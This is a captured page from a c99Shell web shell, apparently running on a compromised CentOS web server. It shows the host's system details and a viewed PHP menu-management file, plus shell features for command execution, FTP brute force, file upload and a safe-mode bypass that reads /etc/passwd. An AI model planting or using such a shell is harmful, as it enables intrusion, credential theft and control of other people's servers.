110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis2222/ums/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/mis2222/ums/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: processUmMenu.php (1.69 KB) -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
include_once("global.php");
include_once("../class/clsConnection.php");
include_once("../class/clsDB.php");
include_once("clsUmMenu.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$obj = new ummenu($oC);
if($_POST['method']=="add"){
	$obj->AddNew();
	$obj->MnStID=$_POST['MnStID'];
	//$obj->MnID=$MnID;
	//$obj->MnSeq=$MnSeq;
	$obj->MnIcon=$_POST['MnIcon'];
	$obj->MnNameT=$_POST['MnNameT'];
	$obj->MnNameE=$_POST['MnNameE'];
	$obj->MnURL=$_POST['MnURL'];
	$obj->MnDesc=$_POST['MnDesc'];
	$obj->MnToolbar=$_POST['MnToolbar'];
	$obj->MnToolbarSeq=$_POST['MnToolbarSeq'];
	$obj->MnToolbarIcon=$_POST['MnToolbarIcon'];
	$obj->MnParentMnID=$_POST['MnParentMnID'];
	$obj->MnLevel=$_POST['MnLevel'];
	$obj->Save();
}else if($_POST['method']=="edit"){
	$obj->SearchByKey($_POST['MnID']);
	$obj->GetRecord();
	$obj->Edit();
	$obj->MnIcon=$_POST['MnIcon'];
	$obj->MnNameT=$_POST['MnNameT'];
	$obj->MnNameE=$_POST['MnNameE'];
	$obj->MnURL=$_POST['MnURL'];
	$obj->MnDesc=$_POST['MnDesc'];
	$obj->MnToolbar=$_POST['MnToolbar'];
	$obj->MnToolbarSeq=$_POST['MnToolbarSeq'];
	$obj->MnToolbarIcon=$_POST['MnToolbarIcon'];
	$obj->Save();
}else if($_POST['method']=="delete"){
	$obj->SearchByKey($_POST['MnID']);
	$obj->GetRecord();
	$obj->Delete();
}else if ($_POST['method']=="updown"){
	$obj->swapMenu($ud, $MnStID, $MnID, $MnSeq, $PmnID, $MnLevel);
}

//$obj->Close();
//$conn->Disconnect();


//else if($method=="deletebytopic"){
//	$flg = $obj->DeleteMenuByTopic($MnID);
//}
//	if ($flg==false){
//		$msg_err = "аЎФґўйНјФґјЕТґ : "   . mysql_error();	
//	}
//
//	$conn->Disconnect();
echo "<meta http-equiv='refresh' content='0; URL=umShowMenu.php?MnStID=".$_POST['MnStID']."'>";

?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0052 ]--